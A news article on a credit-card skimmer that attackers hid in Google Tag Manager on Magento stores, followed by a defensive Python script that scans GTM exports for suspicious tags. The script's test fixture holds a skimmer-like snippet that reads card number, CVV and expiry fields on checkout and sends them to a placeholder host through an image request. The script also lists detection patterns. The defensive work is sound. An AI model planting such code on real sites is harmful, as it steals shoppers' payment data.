- Sucuri finds a credit card skimmer on e-commerce sites powered by Magento
- The skimmer was hiding in Google Tag Manager
- At least six websites were compromised, researchers warn
Cybercriminals have been abusing Google Tag Manager (GTM) to hide malware on Magento e-commerce sites and steal customer payment information, researchers have reported.
Sucuri's researchers say they recently observed one such attack in the wild: a client asked for help after credit card data was stolen from their Magento-based e-commerce website.
Analysts traced the attack to a malicious script embedded in Google Tag Manager. It looked like a legitimate tracking tag but was designed to exfiltrate sensitive data. Google Tag Manager is a free Google tool that lets website owners and marketers deploy tracking snippets (tags) on a site without directly modifying the site's code.
Abused in the wild
The attackers obfuscated the script, which made it harder to detect, and used it to capture payment details entered on the checkout page before sending them to a remote server.
Sucuri also found a backdoor that gave the attackers persistent access. At least six websites were found to be infected with the same GTM container ID, and one of the domains used in the attack, EurowebmonitorTool[dot]com, is now blacklisted by most security vendors.
Using Google Tag Manager to deliver malware is nothing new. The researchers said they covered the technique last year, and the new infection shows the tactic "is still widely used" in the wild. Magento, given its popularity among e-commerce site owners, is a prime target for cybercriminals. Payment data is also highly valuable to them, since it can be used to make fraudulent purchases, fund further malicious campaigns, and more.
To remediate the attack, Sucuri suggests that website administrators remove any suspicious GTM tags, run a full website scan, make sure that Magento and all installed extensions are kept up to date, and monitor both the site and GTM traffic for any unusual activity.
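One way to carry out the first of those steps, finding suspicious tags, is to triage a GTM container export offline rather than reading tags one by one in the GTM console. The script below is an added illustration, not Sucuri's tooling and not code from the original article. It assumes the container export layout (containerVersion -> tag[] -> parameter[] with key "html" for Custom HTML tags); the allowlisted hostnames, the heuristic patterns and the sample container are constructed for the example.

```python
"""Triage a Google Tag Manager container export for Custom HTML tags that
look like a card skimmer: obfuscation primitives, hooks on checkout fields,
and exfiltration calls to hosts outside an allowlist.

Illustrative code, not Sucuri's tooling. The export layout
(containerVersion -> tag[] -> parameter[] with key "html") is assumed; the
allowlist, patterns and sample container below are constructed.
"""
import json
import re
from urllib.parse import urlparse

# Hosts a tag may legitimately reference (assumption: tune per site).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "shop.example"}

# Heuristic indicators, grouped by what they suggest.
OBFUSCATION = [r"\beval\s*\(", r"\batob\s*\(", r"String\.fromCharCode",
               r"\bunescape\s*\(", r"(?:\\x[0-9a-fA-F]{2}){4,}"]
FORM_HOOKS = [r"cc[_-]?number|card[_-]?number|cvv|cvc|expir",
              r"addEventListener\s*\(\s*['\"](?:submit|click|input|change)"]
EXFIL = [r"\bfetch\s*\(", r"XMLHttpRequest", r"sendBeacon", r"new\s+Image\s*\(|\.src\s*="]
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+[^\s'\"<>)]*")


def custom_html_tags(container):
    """Yield (tag name, HTML body) for every Custom HTML tag in the export."""
    for tag in container.get("containerVersion", {}).get("tag", []):
        if tag.get("type") != "html":
            continue
        html = next((p.get("value", "") for p in tag.get("parameter", [])
                     if p.get("key") == "html"), "")
        yield tag.get("name", "<unnamed>"), html


def external_hosts(html):
    """Hostnames referenced by the tag that are not on the allowlist."""
    hosts = set()
    for url in URL_RE.findall(html):
        host = urlparse(url).hostname
        if host and host not in ALLOWED_HOSTS:
            hosts.add(host)
    return hosts


def score_tag(html):
    """Return the list of indicator labels that fire for one tag body."""
    findings = []
    for label, patterns in (("obfuscation", OBFUSCATION),
                            ("form-hook", FORM_HOOKS),
                            ("exfil-api", EXFIL)):
        if any(re.search(p, html) for p in patterns):
            findings.append(label)
    hosts = external_hosts(html)
    if hosts:
        findings.append("unknown-host:" + ",".join(sorted(hosts)))
    return findings


def scan_container(export_json):
    """Map each suspicious Custom HTML tag name to its findings."""
    container = json.loads(export_json)
    return {name: f for name, html in custom_html_tags(container)
            if (f := score_tag(html))}


# Constructed sample export: one benign analytics tag, one skimmer-like tag.
SKIMMER_HTML = """<script>
(function(){var f=document.querySelector('form#checkout');if(!f)return;
f.addEventListener('submit',function(){var d={};
['cc_number','cc_cvv','cc_exp'].forEach(function(k){d[k]=f[k]&&f[k].value;});
var i=new Image();i.src='https://stats-collector.example/c.gif?d='+btoa(JSON.stringify(d));});
eval(atob('Ly8gbW9yZSBwYXlsb2Fk'));})();
</script>"""

SAMPLE_EXPORT = json.dumps({
    "exportFormatVersion": 2,
    "containerVersion": {
        "tag": [
            {"name": "GA pageview", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": '<script async src="https://www.google-analytics.com/analytics.js"></script>'}]},
            {"name": "Checkout helper", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html", "value": SKIMMER_HTML}]},
        ]
    },
})

if __name__ == "__main__":
    for name, findings in scan_container(SAMPLE_EXPORT).items():
        print(f"{name}: {', '.join(findings)}")
```

The unknown-host finding is the most robust signal: the other patterns are trivially renamed by an attacker, but the data has to go somewhere, so any tag that references a host you did not put on the allowlist deserves a manual read. Run this against the current export and against the last known-good version so that newly added or modified tags stand out.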